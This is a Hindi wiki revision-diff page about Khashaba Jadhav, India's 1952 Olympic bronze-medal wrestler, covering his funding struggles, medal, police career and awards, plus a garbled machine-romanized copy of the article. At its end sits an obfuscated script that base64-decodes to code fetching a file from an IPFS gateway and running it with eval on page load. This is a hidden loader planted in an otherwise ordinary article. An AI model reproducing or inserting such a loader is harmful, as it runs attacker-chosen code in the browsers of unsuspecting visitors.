Difference between revisions of "खाशाबा जाधव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''खाशाबा दादासाहेब जाधव''' (अंग्रेज़ी: ''Khashaba Dadasaheb Jadhav'', ज...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
'''खाशाबा दादासाहेब जाधव''' ([[अंग्रेज़ी]]: ''Khashaba Dadasaheb Jadhav'', जन्म- [[15 जनवरी]], [[1926]], [[महाराष्ट्र]]; मृत्यु- [[14 अगस्त]], [[1984]]) [[भारत]] के प्रसिद्ध [[कुश्ती]] खिलाड़ी थे। वे पहले भारतीय खिलाड़ी थे, जिन्होंने सन [[1952]] में हेलसिंकी ओलम्पिक में देश के लिए कुश्ती की व्यक्तिगत स्पर्धा में सबसे पहले कांस्य पदक जीता था। वैसे तो 1952 के हेलसिंकी ओलंपिक में भारतीय हॉकी टीम ने फिर से स्वर्ण पदक हासिल किया था, लेकिन चर्चा सोने से अधिक उस कांस्य पदक की होती है, जिसे पहलवान खाशाबा जाधव ने जीता था। खाशाबा को '''पॉकेट डायनमो''' के नाम से भी जाना जाता है। भारत को ओलम्पिक पदक दिलाने वाला यह खिलाड़ी बाद में गुमनाम बनकर रह गया।  
+
'''खाशाबा दादासाहेब जाधव''' ([[अंग्रेज़ी]]: ''Khashaba Dadasaheb Jadhav'', जन्म- [[15 जनवरी]], [[1926]], [[महाराष्ट्र]]; मृत्यु- [[14 अगस्त]], [[1984]]) [[भारत]] के प्रसिद्ध [[कुश्ती]] खिलाड़ी थे। वे पहले भारतीय खिलाड़ी थे, जिन्होंने सन [[1952]] में हेलसिंकी ओलम्पिक में देश के लिए कुश्ती की व्यक्तिगत स्पर्धा में सबसे पहले कांस्य पदक जीता था। वैसे तो 1952 के हेलसिंकी ओलम्पिक में भारतीय हॉकी टीम ने फिर से स्वर्ण पदक हासिल किया था, लेकिन चर्चा सोने से अधिक उस कांस्य पदक की होती है, जिसे पहलवान खाशाबा जाधव ने जीता था। खाशाबा को '''पॉकेट डायनमो''' के नाम से भी जाना जाता है। भारत को [[ओलम्पिक खेल|ओलम्पिक]] का पदक दिलाने वाला यह खिलाड़ी बाद में गुमनाम बनकर रह गया।  
 
==परिचय==
 
==परिचय==
 
पहलवान खाशाबा जाधव का जन्म 15 जनवरी सन 1926 में [[सतारा]], [[महाराष्ट्र]] में हुआ था। वर्ष [[1940]] से [[1947]] के मध्य खाशाबा जाधव ने अपनी स्कूली शिक्षा तिलक हाई स्कूल, ज़िला कारद से पूरी की। खाशाबा ने कम उम्र में ही स्थानीय चैंपियन को मात्र दो मिनट में पराजित कर दिया था। इसके बाद वे अपने क्षेत्र के निर्विवाद चैंपियन बन गए थे।
 
पहलवान खाशाबा जाधव का जन्म 15 जनवरी सन 1926 में [[सतारा]], [[महाराष्ट्र]] में हुआ था। वर्ष [[1940]] से [[1947]] के मध्य खाशाबा जाधव ने अपनी स्कूली शिक्षा तिलक हाई स्कूल, ज़िला कारद से पूरी की। खाशाबा ने कम उम्र में ही स्थानीय चैंपियन को मात्र दो मिनट में पराजित कर दिया था। इसके बाद वे अपने क्षेत्र के निर्विवाद चैंपियन बन गए थे।
 
==आर्थिक संकट==
 
==आर्थिक संकट==
खाशाबा जाधव ने सबसे पहली बार ओलम्पिक में [[1948]] में हिस्सा लिया था। कोलहापुर के महाराजा ने उनकी [[लंदन]] यात्रा का खर्चा उठाया। तब वे कोई विजयी प्रदर्शन नहीं कर सके। इसके बाद उन्होंने [[1952]] में हेलसिंकी में हुए ओलम्पिक खेलों में एक बार फिर अपनी किस्मत आजमाने का फैसला किया। हेलसिंकी जाना उनके लिए आसान बात नहीं थी। वे क्वालिफ़ाई तो कर चुके थे, लेकिन वहां पहुंचने के लिए उनके पास पैसे नहीं थे। खाशाबा ने हेलसिंकी जाने के लिए सरकार से मदद मांगी, लेकिन तत्कालीन सरकार ने उनसे पल्ला झाड़ लिया। सरकार ने कहा- "जब [[खेल]] खत्म हो जाएं, तब वे उनसे आ कर मिलें।"
+
खाशाबा जाधव ने सबसे पहली बार ओलम्पिक में [[1948]] में हिस्सा लिया था। कोलहापुर के महाराजा ने उनकी [[लंदन]] यात्रा का खर्चा उठाया। तब वे कोई विजयी प्रदर्शन नहीं कर सके। इसके बाद उन्होंने [[1952]] में हेलसिंकी में हुए [[ओलम्पिक खेल|ओलम्पिक खेलों]] में एक बार फिर अपनी किस्मत आजमाने का फैसला किया। हेलसिंकी जाना उनके लिए आसान बात नहीं थी। वे क्वालिफ़ाई तो कर चुके थे, लेकिन वहां पहुंचने के लिए उनके पास पैसे नहीं थे। खाशाबा ने हेलसिंकी जाने के लिए सरकार से मदद मांगी, लेकिन तत्कालीन सरकार ने उनसे पल्ला झाड़ लिया। सरकार ने कहा- "जब [[खेल]] खत्म हो जाएं, तब वे उनसे आ कर मिलें।"
 
==हेलसिंकी ओलम्पिक में प्रतिभाग==
 
==हेलसिंकी ओलम्पिक में प्रतिभाग==
 
खाशाबा ने जैसे हेलसिंकी जाने की ठान ली थी। उन्होंने अपने [[परिवार]] के साथ मिल कर इस यात्रा के लिए भीख मांग कर राशि जुटाई। राज्य सरकार ने उनके लगातार आग्रह के बाद उन्हें 4000 रुपए की छोटी-सी राशि दे दी। उस समय खाशाबा राजाराम कॉलेज में पढ़ा करते थे। उस कॉलेज के प्रधानाध्यापक खरडिकर ने खाशाबा की लगन देखकर उन्हें 7000 रुपए की आर्थिक मदद दे दी। अब उन्हें हेलसिंकी जाने का रास्ता मिल गया था।
 
खाशाबा ने जैसे हेलसिंकी जाने की ठान ली थी। उन्होंने अपने [[परिवार]] के साथ मिल कर इस यात्रा के लिए भीख मांग कर राशि जुटाई। राज्य सरकार ने उनके लगातार आग्रह के बाद उन्हें 4000 रुपए की छोटी-सी राशि दे दी। उस समय खाशाबा राजाराम कॉलेज में पढ़ा करते थे। उस कॉलेज के प्रधानाध्यापक खरडिकर ने खाशाबा की लगन देखकर उन्हें 7000 रुपए की आर्थिक मदद दे दी। अब उन्हें हेलसिंकी जाने का रास्ता मिल गया था।
 
==कांस्य पदक==
 
==कांस्य पदक==
 
खाशाबा जाधव ने हेलसिंकी में कांस्य पदक जीतकर अपना जलवा दिखा दिया। हेलसिंकी की मैट सर्फेस पर वे एडजस्ट नहीं कर सके और इसी कारण वे स्वर्ण पदक से चूक गए। उन खेलों में नियमों के विरुद्ध लगातार दो बाउट रखवाए गए थे। खाशाबा के स्वर्ण पदक से चूकने का यह भी एक प्रमुख कारण रहा था।
 
खाशाबा जाधव ने हेलसिंकी में कांस्य पदक जीतकर अपना जलवा दिखा दिया। हेलसिंकी की मैट सर्फेस पर वे एडजस्ट नहीं कर सके और इसी कारण वे स्वर्ण पदक से चूक गए। उन खेलों में नियमों के विरुद्ध लगातार दो बाउट रखवाए गए थे। खाशाबा के स्वर्ण पदक से चूकने का यह भी एक प्रमुख कारण रहा था।
 +
 +
हेलसिंकी ओलंपिक में यूं तो भारतीय हॉकी टीम ने फिर से स्वर्ण पदक हासिल किया था, लेकिन चर्चा में सबसे ज़्यादा खाशाबा द्वारा जीता गया कांस्य पदक ही रहा। यह पहली बार था, जब किसी भारतीय एथलीट ने व्यक्तिगत पदक हासिल किया हो। इसके पहले [[1900]] में नॉर्मन पिचार्ड ने दो रजत पदक जीते थे, लेकिन वे भारतीय मूल के नहीं थे और तब [[भारत]] भी अंग्रेज़ों के अधीन देश के रूप में हिस्सा लेता था। इतनी बड़ी उपलब्धि के बावजूद खाशाबा को कभी 'पद्म पुरस्कार' नहीं मिला। बेंटमवेट वर्ग (57 कि.ग्रा. से कम) में लड़ने वाले खाशाबा जाधव की चपलता उन्हें अपने समकालीन पहलवानों से अलग करती थी। इसी कारण [[अंग्रेज़]] कोच रीस गार्डनर ने उनकी प्रतिभा को पहचानते हुए उन्हें प्रशिक्षण दिया था।<ref>{{cite web |url=http://www.jagran.com/olympic/headlines-1952-helsinki-olympics-indian-wrestler-jadhav-won-the-first-individual-medal-for-country-14329827.html |title=1952 हेलसिंकी ओलम्पिक:भारतीय पहलवान जाधव ने देश को दिलाया पहला व्यक्तिगत पदक |accessmonthday= 05 अगस्त|accessyear= 2016|last= |first= |authorlink= |format= |publisher=jagran.com |language=हिन्दी }}</ref>
 
==भारत वापसी==
 
==भारत वापसी==
 
पदक जीतने के बाद स्वदेश लौटने पर खाशाबा का जोरदार स्वागत हुआ, लेकिन उनके मन में सिर्फ एक ही बात थी, अपने प्रिंसिपल का वह कर्ज चुकाना। [[भारत]] आने के बाद उन्होंने जो पहली कुश्ती लड़ी, उसकी पूरी इनामी राशि अपने प्रिंसिपल खरडीकर को दे दी, ताकि वे अपना गिरवी रखा घर छुड़ा सकें।
 
पदक जीतने के बाद स्वदेश लौटने पर खाशाबा का जोरदार स्वागत हुआ, लेकिन उनके मन में सिर्फ एक ही बात थी, अपने प्रिंसिपल का वह कर्ज चुकाना। [[भारत]] आने के बाद उन्होंने जो पहली कुश्ती लड़ी, उसकी पूरी इनामी राशि अपने प्रिंसिपल खरडीकर को दे दी, ताकि वे अपना गिरवी रखा घर छुड़ा सकें।
Line 14: Line 16:
  
 
मुंबई पुलिस के लिए खाशाबा जाधव ने 25 साल तक सेवाएं दीं, लेकिन उनके सहकर्मी इस बात को कभी नहीं जान सके कि वे ओलम्पिक चैंपियन हैं। पुलिस विभाग में खेल कोटा खाशाबा के ओलम्पिक में पदक जीतने के बाद ही शुरू हुआ। आज भी लोगों की भर्ती खेल कोटा से होती है, लेकिन यह खाशाबा जाधव की ही देन है, इस बात की जानकारी आज के पुलिस वालों को शायद ही हो।
 
मुंबई पुलिस के लिए खाशाबा जाधव ने 25 साल तक सेवाएं दीं, लेकिन उनके सहकर्मी इस बात को कभी नहीं जान सके कि वे ओलम्पिक चैंपियन हैं। पुलिस विभाग में खेल कोटा खाशाबा के ओलम्पिक में पदक जीतने के बाद ही शुरू हुआ। आज भी लोगों की भर्ती खेल कोटा से होती है, लेकिन यह खाशाबा जाधव की ही देन है, इस बात की जानकारी आज के पुलिस वालों को शायद ही हो।
 +
==पुरस्कार व सम्मान==
 +
अपने सेवाभाव से खाशाबा जाधव ने बहुत-से खिलाड़ी तैयार किये। [[1983]] में 'फ़ाय फ़ाउंडेशन' ने उनको 'जीवन गौरव पुरस्कार' से सम्मानित किया था। [[1990]] में इन्हें 'मेघनाथ नागेश्वर अवार्ड' से (मरणोपरांत) नवाजा गया। 'शिव छत्रपति पुरस्कार' से वे [[1993]] में (मरणोपरांत) नवाजे गए। खाशाबा जाधव भारत माँ के महान सपूत थे, जिसने [[स्वतंत्रता आंदोलन]] में भी बढ़-चढ़कर हिस्सा लिया था। इतना ही नहीं पुलिस में भर्ती होकर देश की सेवा की और साथ ही देश को पहला कांस्य पदक दिलाकर [[भारत]] का सर विश्व में ऊँचा किया।<ref>{{cite web |url=http://www.krantidoot.in/2015/08/India-first-Olympic-medalist-wrestler-Dadasaheb-Jadhav.html |title=भुला दिए गए भारत को पहला ओलिंपिक मेडल दिलाने वाले पहलवान दादासाहेब जाधव|accessmonthday=05 अगस्त|accessyear=2016 |last= |first= |authorlink= |format= |publisher=krantidoot.in |language=हिन्दी}}</ref>
 +
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}

Revision as of 07:03, 5 August 2016

khashaba dadasaheb jadhav (aangrezi: Khashaba Dadasaheb Jadhav, janm- 15 janavari, 1926, maharashtr; mrityu- 14 agast, 1984) bharat ke prasiddh kushti khila di the. ve pahale bharatiy khila di the, jinhoanne san 1952 mean helasianki olampik mean desh ke lie kushti ki vyaktigat spardha mean sabase pahale kaansy padak jita tha. vaise to 1952 ke helasianki olampik mean bharatiy h aauki tim ne phir se svarn padak hasil kiya tha, lekin charcha sone se adhik us kaansy padak ki hoti hai, jise pahalavan khashaba jadhav ne jita tha. khashaba ko p aauket dayanamo ke nam se bhi jana jata hai. bharat ko olampik ka padak dilane vala yah khila di bad mean gumanam banakar rah gaya.

parichay

pahalavan khashaba jadhav ka janm 15 janavari san 1926 mean satara, maharashtr mean hua tha. varsh 1940 se 1947 ke madhy khashaba jadhav ne apani skooli shiksha tilak haee skool, zila karad se poori ki. khashaba ne kam umr mean hi sthaniy chaianpiyan ko matr do minat mean parajit kar diya tha. isake bad ve apane kshetr ke nirvivad chaianpiyan ban ge the.

arthik sankat

khashaba jadhav ne sabase pahali bar olampik mean 1948 mean hissa liya tha. kolahapur ke maharaja ne unaki landan yatra ka kharcha uthaya. tab ve koee vijayi pradarshan nahian kar sake. isake bad unhoanne 1952 mean helasianki mean hue olampik kheloan mean ek bar phir apani kismat ajamane ka phaisala kiya. helasianki jana unake lie asan bat nahian thi. ve kvalifaee to kar chuke the, lekin vahaan pahuanchane ke lie unake pas paise nahian the. khashaba ne helasianki jane ke lie sarakar se madad maangi, lekin tatkalin sarakar ne unase palla jha d liya. sarakar ne kaha- "jab khel khatm ho jaean, tab ve unase a kar milean."

helasianki olampik mean pratibhag

khashaba ne jaise helasianki jane ki than li thi. unhoanne apane parivar ke sath mil kar is yatra ke lie bhikh maang kar rashi jutaee. rajy sarakar ne unake lagatar agrah ke bad unhean 4000 rupe ki chhoti-si rashi de di. us samay khashaba rajaram k aaulej mean padha karate the. us k aaulej ke pradhanadhyapak kharadikar ne khashaba ki lagan dekhakar unhean 7000 rupe ki arthik madad de di. ab unhean helasianki jane ka rasta mil gaya tha.

kaansy padak

khashaba jadhav ne helasianki mean kaansy padak jitakar apana jalava dikha diya. helasianki ki mait sarphes par ve edajast nahian kar sake aur isi karan ve svarn padak se chook ge. un kheloan mean niyamoan ke viruddh lagatar do baut rakhavae ge the. khashaba ke svarn padak se chookane ka yah bhi ek pramukh karan raha tha.

helasianki olanpik mean yooan to bharatiy h aauki tim ne phir se svarn padak hasil kiya tha, lekin charcha mean sabase zyada khashaba dvara jita gaya kaansy padak hi raha. yah pahali bar tha, jab kisi bharatiy ethalit ne vyaktigat padak hasil kiya ho. isake pahale 1900 mean n aaurman pichard ne do rajat padak jite the, lekin ve bharatiy mool ke nahian the aur tab bharat bhi aangrezoan ke adhin desh ke roop mean hissa leta tha. itani b di upalabdhi ke bavajood khashaba ko kabhi 'padm puraskar' nahian mila. beantamavet varg (57 ki.gra. se kam) mean l dane vale khashaba jadhav ki chapalata unhean apane samakalin pahalavanoan se alag karati thi. isi karan aangrez koch ris gardanar ne unaki pratibha ko pahachanate hue unhean prashikshan diya tha.[1]

bharat vapasi

padak jitane ke bad svadesh lautane par khashaba ka joradar svagat hua, lekin unake man mean sirph ek hi bat thi, apane priansipal ka vah karj chukana. bharat ane ke bad unhoanne jo pahali kushti l di, usaki poori inami rashi apane priansipal kharadikar ko de di, taki ve apana giravi rakha ghar chhu da sakean.

nidhan

san 1955 mean shashaba jadhav ko muanbee pulis mean sab-ianspektar ki naukari mili. agale kee varshoan tak ve isi pad par bina kisi pramoshan ke bane rahe. 1982 mean mahaj 6 mahinoan ke lie unhean asisteant pulis kamishnar ka pad diya gaya. isake bad ve sevanivritt ho ge. sevanivritti ke mahaj do sal bad ek s dak durghatana mean unaka nidhan ho gaya. aj dilli mean khashaba jadhav ke nam se stediyam hai, lekin unake parivar ko koee arthik sahayata muhaiya nahian ho saki hai.

muanbee pulis ke lie khashaba jadhav ne 25 sal tak sevaean dian, lekin unake sahakarmi is bat ko kabhi nahian jan sake ki ve olampik chaianpiyan haian. pulis vibhag mean khel kota khashaba ke olampik mean padak jitane ke bad hi shuroo hua. aj bhi logoan ki bharti khel kota se hoti hai, lekin yah khashaba jadhav ki hi den hai, is bat ki janakari aj ke pulis valoan ko shayad hi ho.

puraskar v samman

apane sevabhav se khashaba jadhav ne bahut-se khila di taiyar kiye. 1983 mean 'fay fauandeshan' ne unako 'jivan gaurav puraskar' se sammanit kiya tha. 1990 mean inhean 'meghanath nageshvar avard' se (maranoparaant) navaja gaya. 'shiv chhatrapati puraskar' se ve 1993 mean (maranoparaant) navaje ge. khashaba jadhav bharat maan ke mahan sapoot the, jisane svatantrata aandolan mean bhi badh-chadhakar hissa liya tha. itana hi nahian pulis mean bharti hokar desh ki seva ki aur sath hi desh ko pahala kaansy padak dilakar bharat ka sar vishv mean ooancha kiya.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>